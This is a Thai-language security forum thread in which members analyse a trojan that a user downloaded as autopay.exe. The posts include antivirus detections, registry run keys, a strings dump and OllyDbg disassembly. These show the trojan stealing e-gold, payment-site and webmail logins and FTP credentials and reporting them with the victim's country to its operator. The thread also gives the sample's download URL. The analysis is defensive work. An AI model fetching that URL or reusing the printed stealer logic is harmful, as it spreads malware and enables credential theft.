ผมอยากให้พี่ๆตรวจสอบให้ทีครับว่าไฟล์นี้เป็นไวรัสหรือสปายแวร์หรือป่าว
ไฟล์นี้ครับ
ถ้าใช่ขอวิธีแก้ด้วยนะครับ เพราะดับเบิ้ลคลิกมันไปแล้ว
ผมอยากให้พี่ๆตรวจสอบให้ทีครับว่าไฟล์นี้เป็นไวรัสหรือสปายแวร์หรือป่าว
ไฟล์นี้ครับ
ถ้าใช่ขอวิธีแก้ด้วยนะครับ เพราะดับเบิ้ลคลิกมันไปแล้ว
[SIZE=2]ที่ 1 ไม่ไหว ที่ 2 ไม่ขอ เป็นรองไม่รอ ขออยู่คนเดียวตลอดไป[/SIZE]
ผมทดลองตรวจสอบไฟล์ดังกล่าวพบว่า พอ Double Click แล้วมันหายไป เป็นการลบไฟล์ตัวเองหลังจากติดตั้ง Backdoor แล้ว และไม่สามารถเข้าถึง msconfig ได้ด้วย และ จากข้อมูลดังกล่าว
**Hidden Content: To see this hidden content your post count must be 10 or greater.**
<div align="center"><span style="font-family:Tahoma"><span style="color:#3333FF"><div align="center">-= CWH Underground Vulnerabilities Disclosure =-</div></span></span>
Be Safe,
/0x5A655133754C
Send All Submission to lucifer[at]citec.us
----------------------------------------------------------------------------------------
<span style="color:gray">`Hacking isn't about helping the security industry, Which leeches from Hacker`
<div align="center"></div>
<div align="center"></div>
AntiVir - - TR/Crypt.NSPM.Gen
CAT-QuickHeal - - (Suspicious) - DNAScan
eSafe - - suspicious Trojan/Worm
F-Prot - - W32/Downloader.N.gen!Eldorado
Norman - - W32/Smalltroj.BRLH
Panda - - Suspicious file
Rising - - Trojan.DL.Win32.Small.etp
Sunbelt - - VIPRE.Suspicious
Webwasher-Gateway - - Trojan.Crypt.NSPM.Gen
MD5: e8356fd4e4c366a808c25dcd90593348
kernel32.dll
user32.dll
.fsg
.adata
พอจะบอกที่มาของไฟล์ได้ไหมครับว่าดาวน์โหลดมาแล้วติด หรือว่า สร้างเอง
แนวทางการแก้
**Hidden Content: To see this hidden content your post count must be 10 or greater.**
" I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."
—Stephen Hawking
อจะบอกที่มาของไฟล์ได้ไหมครับว่าดาวน์โหลดมาแล้วติด หรือว่า สร้างเอง---> โหลดมาครับ
http://paidemailclicks.com/autopay.exe
พอดีผมเข้าไปสมัครเว็บพวกนี้แล้วทำเล่นแก้เซ็ง แล้วมันบอกว่าให้โหลด แล้วพอโหลดเสร็จก็ run ไฟล์ เลยติดเลยมาถามวิธีแก้ครับ
-------------------------------------------
โดยเช็คที่ไดเรคทอรีสองที่นี้
C:\WINDOWS\system32\dllcache\msconfig.exe --->ไม่มีครับ
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe --->มีครับ
msconfig.exe ใช้ร่วมกันได้ใช่ไมครับ
-------------------------------------------
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\\kernel32.dll
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\\user32.dll
ของผมมีแค่นี้ครับ
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies (explorerผมไม่มี(นานแล้วครับ))
-------------------------------------------
kernel32.dll
user32.dll
C:\WINDOWS\system32 มีครับ
C:\WINDOWS\system32\dllcache ไม่มีครับ
kernel32.dll ของพี่ 5.1.2600.3119 ของผม 5.1.2600.2687 (version ไม่เหมือนกันกลัวลงไม่ได้ครับ)
user32.dll ของพี่ 5.1.2600.3099 ของผม 5.1.2600.2622 (version ไม่เหมือนกันกลัวลงไม่ได้ครับ)
-------------------------------------------
[SIZE=2]ที่ 1 ไม่ไหว ที่ 2 ไม่ขอ เป็นรองไม่รอ ขออยู่คนเดียวตลอดไป[/SIZE]
วิเคราะห์แบบ หยาบๆ เครื่องมือไม่พร้อม ได้ความว่า
autopay.exe มัน pack กับ ASPack 2.12 -> Alexey Solodovnikov [Overlay] ต้อง manual unpack ใช้เครื่องมือไม่เวิร์ค
หาก run autopay.exe จะสร้าง smsxxxxx.dll [x จะ random ทุกครั้งที่ run autopay.exe ] ไฟล์ dll ถูกสร้างอยู่ใน system32
ใน dll มีข้อความดังนี้ ให้ผมเดา คงไม่น่ามี startup คง run แล้วเหมือน พยายาม inject dll แต่รู้สึกว่าไม่สำเร็จ
ถ้าสำเร็จคงได้ข้อมูล ไปบานเลย 555 เครื่องไม่พร้อม ใช้เครื่องคนอื่นทำ เลยวิเคราะห์ได้ไม่ละเอียดนัก....
e-gold.com..........stat.php?id=............&country=.......9...&text=------------------------------------ [HOLDER_MAIL] .......(... ------------------------------------***....SOFTWARE\E-COMERR15SS...........@e-gold.com.........xxxxxxx.xxx.........AccountID...........StoreMyNumber...........PassPhrase..........Turing..........AccountID=..........&.......<...ujdq.rdf`lh.rdhkhlr.rdf`lh.rdctkbmh,ov.lnb-rrdmshetnx..9ossg............Payee_Account=..........ANNA............TEREZA..........&Amount=........C...&PAY_IN=9999&WORTH_OF=Gold&Memo=spend&Currency_Symbol=oz&FIAT_RATE=.........&PAYEE_NAME=............+...........&ACTUAL_PAYMENT_OUNCES=.........&PAYMENT_AMOUNT=........5...&PAYMENT_UNITS=9999&PAYMENT_METAL_ID=1&PAYER_ACCOUNT=...........&USD_PER_OUNCE=.........&autoT1=............&autoT2=............&BAction=Confirm............Id=......... ...........Country=........&...ip=//*~~~~~*//DateTime=//*DATETIME*// ..........Payer_account=..........Amount=.........gold.php?id=............&text=..........payment.php?&text=........../........... || ........./payment.txt............icq.php?text=...........SOFTWARE\E-COMERR15SS...SOL.Security............rekv........ ...&PAY_IN=9999&WORTH_OF=Gold&Memo=............&past=&BAction=Preview..........login...........spend.........../acct/li.asp............paypal.com..........e-bullion.com...........secure.e-bullion.com............rupay.com...........money.yandex.ru.........sauth.yandex.ru.........sp-money.yandex.ru..........passport.yandex.ru..........secure.pecunix.com..........pecunix.com.........money.mail.ru...........login.yahoo.com.........login.live.com..........gmail.com...........onyxpay.com.........my.screenname.aol.com.......*...------------------------------------ [URL=..........]...........[IP=//*~~~~~*////*DATETIME*//]..U..j.SV.u..].3.UhS=..d.0d. .......j...l=.......u1..k....=.......u .E....$....E...=.......u....f.....j...l=.......u!.=.f...u....f.....=....=.....f....=.f...........k....=...L...tf..k....=...;...tU..k....=...*...tD..k....>.......t3..k...0>.......t"..k...L>.......t...k...d>.......u....f.....=...x>....j...l=.......u$h.k..h....j.h.>..h.....w.....u...>...E$P.E P.E.P.E.P.E.PVS.E.P..$k.........3.ZYYd..hZ=...E........T.......^[Y]. ..........e-gold.com........../acct/li.asp............POST....POST..../acct/verify.asp............/acct/balance.asp.........../acct/confirm.asp.........../acct/spend.asp........./acct/redeem.asp............/acct/history.asp.........../acct/ai.asp............/acct/logout.asp....acct/confirm.asp....SOFTWARE\E-COMERR15SS.......U..j.j.j.SVW.u..}...k..3.UhKD..d.0d. ......=.f...u.W.#....E.P.E.PVW..4k.....=.f..........E.........U...f...a.....f...O...=.>..........f.....f..........f...hD...T.....f...=.f............f..I..f...............f...xD.........f...=.f...~Q...f.......f........R......f....D.........f...=.f...~.h.f.....f..I.......f..........f....=.f...t...f...s......}...f.....f...>....=.f..........E.........U...f...B.....f...0...=X............f......f....D...>......;.~........f...............f....D..........;.~.h.f....I.......f..........f....D..........;.~........f........&......f....D..........;.~.h.f....I.......f..........f....D..........;.~........f...............f....D...a......;.~.h.f....I.......f..._......f....E...3......;.~........f........t......f...,E..........;.~.h.f....I.......f..........f...8E..........;.~........f...............f...,E..........;.~.h.f....I.......f..........f.....f........PE...=.f..........E.........U...f.../.....f.......=X............f......f......f...\E...$......;.~...f..........h......f...pE..........;.~........f........=......f....E..........;.~...f.................f...,E..........;.~...f.................f....E.........h.f...........f..........f....D...Y......;.~.h.f....I.......f...W......f....E...+......;.~........f........l......f....E..........;.~.h.f...........f.........f.......f..j....5.j....~;.. k.........f....E..........;.~...f................ k..Nu...f....E.......u....f........3.ZYYd..hRD...E.............\......._^[..]..............e-mail:.........size="2"............</font>.........FIAT_RATE value="...........">..........ACTUAL_PAYMENT_OUNCES value="...........PAYER_ACCOUNT value="...........name="autoT1" value=............>...........name="autoT2" value=................<td align...........</td>...........size............</tr>.................... ...........0.000000....U..j.j.SVW..k....k..3.Uh#I..d.0d. 3.Uh.H..d.0d. .E..U..)....U..@I..........;.~W.E..U.... k...E.................U..XI...a......;.~$.E.P..I......E..b.....I.E............U..dI...)......;.~W.E....... k...E............_....U..XI..........;.~$.E.P..I......E........I.E.......'....U..xI..........;.~W.E....... k...E.................U..XI..........;.~$.E.P..I......E........I.E............U...I...S......;.~W.E....... k...E.................U..XI... ......;.~$.E.P..I......E..!.....I.E.......Q.....j...U.........U........j....I.......u.....I.......u....f.....j....I..............=.f...ux....I.......tT....I.......tF....J.......t8....J...x...t*...4J...j...t....PJ...\...t....hJ...N...u....f....|J...E....f.....j....I...'...u.....I.......u....f.....j....I.......u'h.k..h....j.h.J..h...........u...J...E.3.ZYYd...............E.P.E.P.E.P.E.P..(k....3.ZYYd..h*I...E....................._^[YY]..............https://www............./...........http://www..........https://............http://.........e-gold.com........../acct/li.asp............/acct/balance.asp.........../acct/confirm.asp.........../acct/spend.asp........./acct/redeem.asp............/acct/history.asp.........../acct/ai.asp............/acct/logout.asp....https://www.e-gold.com/acct/balance.asp.SOFTWARE\E-COMERR15SS.......U..3.QQQQQQSVW.u..]..}.3.Uh`L..d.0d. f.....7.....f...|L...R....5.f..h.L..h.L....f.............5.f..h.L...E..U.......u.h.L....f.............5.f..h.L...E.........u.h.L....f.............5.f..h.L...E.........u.h.L....f.............5.f..h.L..h.M....f........o.....ta..t]......5.j..h.M...E...f........m....u.h$M...5.j..h8M...5.f...E............E..U........f........E$P.E P.E.PVSW.E.P.E.P..,k....3.ZYYd..hgL...E.............G......._^[..]. ...........------------------ .........FTP......... ...........SERVER=.........USERNAME=...........PASSWORD=...........------------------..........***.........ftp.php?id=.........&country=...........&info=..U..3.UhcN..d.0d. ..k.........k.........k.........j.........j...y.....j...o.....j...e.....f...[.....f...Q.....f...G.....f...=.....f...3.....f...).....f.........f.........f.........f.........f.........f.........f.........f.........f.........f.........f.........f.........f.......3.ZYYd..hjN....D.....].....tN..$!... ..........\!..,!...!...!..T"..$"..."..\"...&...&......@M..U......lN.......3.Uh]O..d.0d. h0k....*...lO....O.......h4k....>....O....O.......h,k....J....O....O.......h(k....E....O....O.......h$k....;....O....O.......3.ZYYd..hdO....J.............HttpSendRequestA....wininet.dll.InternetReadFile....InternetConnectA....InternetCrackUrlA...HttpOpenRequestA....................................................2.....@...@.................x...L...L.............................................@.L...L...T...............................0 ........... ...B.B. . ..B......B.B. . ..B......B.B. . ..B......B.B. . ..B......B.B. . ..B......B.B. . ..B......B.B. . ..B...............B.....E`E`E`E`E`E`E`E`E`E`E`E`E`E`E`E`E.E.E.E.E.E.E.E.E`E`E`E`E`E`E`E`.......B...........,...$.........................................................B.B. . .B. ......F.F.F.F.F.F.F...................B...B...........B..............d.d.d.d.d.d.d.dElElElElElElElEl.E.E..... . .E.M.................A.A.A.A..................................B...B...........G...G..............................A.... .. . ......................-.?.?.?.?.?.?.?.?.................#@#@#.#.........?.?./.?.=.=.?.?.................................. . . . . . . . . . . . . . . . 'B?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.............................e...............................e....................................A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.........G.C...........B.G.C .. ..... .B. ."T!.!.......B. . T!.!....?.$.e..$?.(..`.`.`.`.`.`.`.`............... ............................?........................................................A.A.............A.A.............A.A.............A.A........ . . . . . . . .6.6.0.0.6.6.6.6. ... . .........0.0...0......... . . . . . . . .6.6.6.6......... ... . ...0...0.6.6.6.6...6.6...(.(.(.(.(.(.(.(.6.6.0.0.6.6.6.6.(...(.(.........0.0.0.0.0.0.....................6.6.0.6.6.6.6.6.........0.(.0.(.0.0.0.0...6.6........................................................p..dp...............r...p..............rr...p...............r...p.......................q...q..*q..Fq..Rq..dq..tq...q...q...q...q...q...q...q...q...q...q.......r..&r..6r..Dr..Rr..dr.......r...r...r...r...r...r.......r...s..$s..4s......kernel32.dll....GetCurrentThreadId....ExitProcess...UnhandledExceptionFilter....RtlUnwind...RaiseException....GetSystemTime...TlsSetValue...TlsGetValue...TlsFree...TlsAlloc....LocalFree...LocalAlloc....FreeLibrary...HeapFree....HeapReAlloc...HeapAlloc...GetProcessHeap..advapi32.dll....
RegSetValueExA....
RegOpenKeyExA...
RegOpenKeyA...
RegEnumKeyA...
RegCreateKeyExA...
RegCloseKey.kernel32.dll....
VirtualProtect....
LoadLibraryA....
GetSystemDirectoryA...
GetProcAddress....
GetModuleHandleA....
GetLocaleInfoA..
wininet.dll...
InternetReadFile....
InternetOpenUrlA....
InternetOpenA...
InternetCloseHandle................
ลองวิเคราะห์แบบ full option ให้หน่อยครับ
เราจะรู้ได้ไงว่ามัน pack แบบไหนอ่ะครับ
ขอความรู้ด้วย
ดูแบบนี้แล้วตัวโทรจันมันคือแค่ ไฟล์ dll ป่าว แล้ว msconfig มันใช้งานไม่ได้ได้ไงครับ
" I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."
—Stephen Hawking
msconfig มันไม่ได้ปิดนี่ครับ ของผมไม่เห็นมันปิดเลยลองวิเคราะห์แบบ full option ให้หน่อยครับ
เราจะรู้ได้ไงว่ามัน pack แบบไหนอ่ะครับ
ขอความรู้ด้วย
ดูแบบนี้แล้วตัวโทรจันมันคือแค่ ไฟล์ dll ป่าว แล้ว msconfig มันใช้งานไม่ได้ได้ไงครับ[/b]
ตัว autopay.exe เวลา run มันจะแตกตัว smsxxxxx.dll [ และจะมีอักษรที่สุ่มอีก 5 หลัก ] คือ มัน ยัด dll ลง exe
แล้วใช้ autopay.exe ยิงเข้า memory เพื่อ ทำ fwb (Firewall bypass) แต่น่าเสียดาย autopay.exe มัน pack ด้วย ASPack 2.12
มัน unpack ยากต้อง manual ใช้ OllyDBG หา OEP และใช้ Import.REConstructor 1.6 แก้ แต่ version ต่างกันนิดเดียวก็ไม่เวิร์คแล้ว
มันยากตรงนี้แหละ แต่มี เครื่องมือ สำเร็จรูปหลายๆตัว Unpack ได้ เช่น quickunpack 1.0 final แต่ก็อาจไม่เวิร์ค .....
เลยไม่สนใจตัว autopay.exe ซึ้งเป็นตัวยิง แต่ส่วนใหญ่มันจะ ยิงเข้า explorer.exe หรือ svchost.exe ตัวโทรจันมันจะแทรกตัวเป็น
หนึ่งเดียวกับ process นั้นเลยทีเดียว ความจริงมีเทคนิคที่ใหม่กว่า เช่น Inject EXE หรือ code เข้าไปเลยไม่ต้องใช้ dll เลย...
ดูจาก dll มันไม่ได้ pack เพราะหากมัน pack มันจะมีปัญหากับ memory ที่ยิงเข้าไปแน่นอน เป็นที่ทราบกันดีอยู่แล้ว ...
131447C7 . BA 9C491413 MOV EDX,1314499C ; ASCII "e-gold.com"
131447CC . E8 E3D3FFFF CALL 13141BB4
131447D1 . 75 15 JNZ SHORT 131447E8
131447D3 . 8B06 MOV EAX,DWORD PTR DS:[ESI]
131447D5 . BA B0491413 MOV EDX,131449B0 ; ASCII "/acct/li.asp"
131447DA . E8 D5D3FFFF CALL 13141BB4
131447DF . 75 07 JNZ SHORT 131447E8
131447E1 . C605 A4661413>MOV BYTE PTR DS:[131466A4],1
131447E8 > A1 FC6A1413 MOV EAX,DWORD PTR DS:[13146AFC]
131447ED . BA 9C491413 MOV EDX,1314499C ; ASCII "e-gold.com"
131447F2 . E8 BDD3FFFF CALL 13141BB4
131447F7 . 0F85 81000000 JNZ 1314487E
131447FD . 803D D9661413>CMP BYTE PTR DS:[131466D9],1
13144804 . 75 78 JNZ SHORT 1314487E
13144806 . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144808 . BA C8491413 MOV EDX,131449C8 ; ASCII "/acct/balance.asp"
1314480D . E8 A2D3FFFF CALL 13141BB4
13144812 . 74 54 JE SHORT 13144868
13144814 . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144816 . BA E4491413 MOV EDX,131449E4 ; ASCII "/acct/confirm.asp"
1314481B . E8 94D3FFFF CALL 13141BB4
13144820 . 74 46 JE SHORT 13144868
13144822 . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144824 . BA 004A1413 MOV EDX,13144A00 ; ASCII "/acct/spend.asp"
13144829 . E8 86D3FFFF CALL 13141BB4
1314482E . 74 38 JE SHORT 13144868
13144830 . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144832 . BA 184A1413 MOV EDX,13144A18 ; ASCII "/acct/redeem.asp"
13144837 . E8 78D3FFFF CALL 13141BB4
1314483C . 74 2A JE SHORT 13144868
1314483E . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144840 . BA 344A1413 MOV EDX,13144A34 ; ASCII "/acct/history.asp"
13144845 . E8 6AD3FFFF CALL 13141BB4
1314484A . 74 1C JE SHORT 13144868
1314484C . 8B06 MOV EAX,DWORD PTR DS:[ESI]
1314484E . BA 504A1413 MOV EDX,13144A50 ; ASCII "/acct/ai.asp"
13144853 . E8 5CD3FFFF CALL 13141BB4
13144858 . 74 0E JE SHORT 13144868
1314485A . 8B06 MOV EAX,DWORD PTR DS:[ESI]
1314485C . BA 684A1413 MOV EDX,13144A68 ; ASCII "/acct/logout.asp"
13144861 . E8 4ED3FFFF CALL 13141BB4
13144866 . 75 16 JNZ SHORT 1314487E
13144868 > C605 D9661413>MOV BYTE PTR DS:[131466D9],0
1314486F . B8 7C4A1413 MOV EAX,13144A7C ; ASCII "https://www.e-gold.com/acct/balance.asp"
13144874 . 8945 08 MOV DWORD PTR SS:[EBP+8],EAX
13144877 . C605 D8661413>MOV BYTE PTR DS:[131466D8],1
1314487E > A1 FC6A1413 MOV EAX,DWORD PTR DS:[13146AFC]
13144883 . BA 9C491413 MOV EDX,1314499C ; ASCII "e-gold.com"
13144888 . E8 27D3FFFF CALL 13141BB4
1314488D . 75 15 JNZ SHORT 131448A4
1314488F . 8B06 MOV EAX,DWORD PTR DS:[ESI]
13144891 . BA B0491413 MOV EDX,131449B0 ; ASCII "/acct/li.asp"
13144896 . E8 19D3FFFF CALL 13141BB4
1314489B . 75 07 JNZ SHORT 131448A4
1314489D . C605 D9661413>MOV BYTE PTR DS:[131466D9],1
131448A4 > A1 FC6A1413 MOV EAX,DWORD PTR DS:[13146AFC]
131448A9 . BA 9C491413 MOV EDX,1314499C ; ASCII "e-gold.com"
131448AE . E8 01D3FFFF CALL 13141BB4
131448B3 . 75 27 JNZ SHORT 131448DC
131448B5 . 68 0C6B1413 PUSH 13146B0C ; /pHandle = smshhehh.13146B0C
131448BA . 68 19000200 PUSH 20019 ; |Access = KEY_READ
131448BF . 6A 00 PUSH 0 ; |Reserved = 0
131448C1 . 68 A44A1413 PUSH 13144AA4 ; |Subkey = "SOFTWARE\E-COMERR15SS"
131448C6 . 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
131448CB . E8 B4D8FFFF CALL <JMP.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA[/b]
คิดว่ามันออกแบบมา crack password ที่ https://www.e-gold.com/acct/balance.asp
เขียน registry ที่ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\alphabet\คีย์สุ่มตัวเลข13142879 |. 68 186B1413 PUSH 13146B18 ; /pHandle = smshhehh.13146B18
1314287E |. 68 30291413 PUSH 13142930 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\alphabet\"
13142883 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
13142888 |. E8 EFF8FFFF CALL <JMP.&advapi32.RegOpenKeyA> ; \RegOpenKeyA[/b]
เป็นการ notify เข้า ftp ของคนที่ปล่อย หาก เจอ password ก็ ftp กลับเข้ามา รู้สึกยังไม่ได้ปรับแต่ ยังโล่งๆ อยู่13144AF4 |. BA 7C4C1413 MOV EDX,13144C7C ; ASCII "------------------ "
13144AF9 |. E8 52CEFFFF CALL 13141950
13144AFE |. FF35 D4661413 PUSH DWORD PTR DS:[131466D4]
13144B04 |. 68 984C1413 PUSH 13144C98 ; ASCII "FTP"
13144B09 |. 68 A44C1413 PUSH 13144CA4
13144B0E |. B8 D4661413 MOV EAX,131466D4
13144B13 |. BA 03000000 MOV EDX,3
13144B18 |. E8 13D0FFFF CALL 13141B30
13144B1D |. FF35 D4661413 PUSH DWORD PTR DS:[131466D4]
13144B23 |. 68 B04C1413 PUSH 13144CB0 ; ASCII "SERVER="
13144B28 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
13144B2B |. 8B55 0C MOV EDX,DWORD PTR SS:[EBP+C]
13144B2E |. E8 F5CEFFFF CALL 13141A28
13144B33 |. FF75 FC PUSH DWORD PTR SS:[EBP-4]
13144B36 |. 68 A44C1413 PUSH 13144CA4
13144B3B |. B8 D4661413 MOV EAX,131466D4
13144B40 |. BA 04000000 MOV EDX,4
13144B45 |. E8 E6CFFFFF CALL 13141B30
13144B4A |. FF35 D4661413 PUSH DWORD PTR DS:[131466D4]
13144B50 |. 68 C04C1413 PUSH 13144CC0 ; ASCII "USERNAME="
13144B55 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
13144B58 |. 8BD3 MOV EDX,EBX
13144B5A |. E8 C9CEFFFF CALL 13141A28
13144B5F |. FF75 F8 PUSH DWORD PTR SS:[EBP-8]
13144B62 |. 68 A44C1413 PUSH 13144CA4
13144B67 |. B8 D4661413 MOV EAX,131466D4
13144B6C |. BA 04000000 MOV EDX,4
13144B71 |. E8 BACFFFFF CALL 13141B30
13144B76 |. FF35 D4661413 PUSH DWORD PTR DS:[131466D4]
13144B7C |. 68 D44C1413 PUSH 13144CD4 ; ASCII "PASSWORD="
13144B81 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
13144B84 |. 8BD6 MOV EDX,ESI
13144B86 |. E8 9DCEFFFF CALL 13141A28
13144B8B |. FF75 F4 PUSH DWORD PTR SS:[EBP-C]
13144B8E |. 68 A44C1413 PUSH 13144CA4
13144B93 |. B8 D4661413 MOV EAX,131466D4
13144B98 |. BA 04000000 MOV EDX,4
13144B9D |. E8 8ECFFFFF CALL 13141B30
13144BA2 |. FF35 D4661413 PUSH DWORD PTR DS:[131466D4]
13144BA8 |. 68 E84C1413 PUSH 13144CE8 ; ASCII "------------------"
13144BAD |. 68 044D1413 PUSH 13144D04 ; ASCII "***"
13144BB2 |. B8 D4661413 MOV EAX,131466D4
13144BB7 |. BA 03000000 MOV EDX,3
13144BBC |. E8 6FCFFFFF CALL 13141B30
13144BC1 |. 85DB TEST EBX,EBX
13144BC3 |. 74 61 JE SHORT 13144C26
13144BC5 |. 85F6 TEST ESI,ESI
13144BC7 |. 74 5D JE SHORT 13144C26
13144BC9 |. E8 96DCFFFF CALL 13142864
13144BCE |. FF35 F06A1413 PUSH DWORD PTR DS:[13146AF0]
13144BD4 |. 68 104D1413 PUSH 13144D10 ; ASCII "ftp.php?id="[/b]
13144BEB |. FF75 E8 PUSH DWORD PTR SS:[EBP-18]
13144BEE |. 68 244D1413 PUSH 13144D24 ; ASCII "&country="
13144BF3 |. FF35 EC6A1413 PUSH DWORD PTR DS:[13146AEC]
13144BF9 |. 68 384D1413 PUSH 13144D38 ; ASCII "&info="[/b]
ระบุประเทศกับ รายละเอียดเหยื่อเวลา notify กลับมาจะได้รู้ว่ามาจากที่ไหน
เพราะท่าน lucifer บอกว่า ถ้าติดแล้วจะเข้าถึง msconfig ไม่ได้ น่ะครับ แต่ผมยังต้องใช้เครื่องนี้ทำงานสำคัญอยู่ ผมยังไม่ได้ลองกับเครื่องจริงเลยครับ และเครื่องผมก็แรมน้อยใช้งาน vmware ไม่ได้
ถ้าอย่างนั้นแสดงว่าท่านลูน่าจะติดตัวอื่นผสมด้วยแน่ๆเลย เป็นไปได้ว่าจะเป็น limit.exe หรือ autoit.i หรือ ตัวอื่นๆที่เขียนด้วย autoit
" I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."
—Stephen Hawking
ผมได้ใช้ Filemon, Regmon, Processmon ของ sysinternals เก็บ log มาให้ดูเป็นข้อมูลเพิ่มเติมครับ
หลักๆ แล้วก็เป็นอย่างที่ท่าน neoclassic บอกแหละครับ
ลองดูว่ามันไปเขียนไฟล์ และ Registry ที่ไหนบ้างและก็ตามไปลบได้ครับ (อาจจะเหนื่อยหน่อย)
**Hidden Content: To see this hidden content your post count must be 10 or greater.**
สำหรับ ตัว autopay.exe ที่ท่าน neoclassic ได้บอกไว้ว่าติดในเรื่องการ unpack เลยเลิกสนใจไป
เราลองมาดูรายละเอียดกันครับ
**Hidden Content: To see this hidden content your post count must be 10 or greater.**
" I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."
—Stephen Hawking
Actions : (View-Readers)
There are no names to display.
Posting Permissions
Reply With Quote
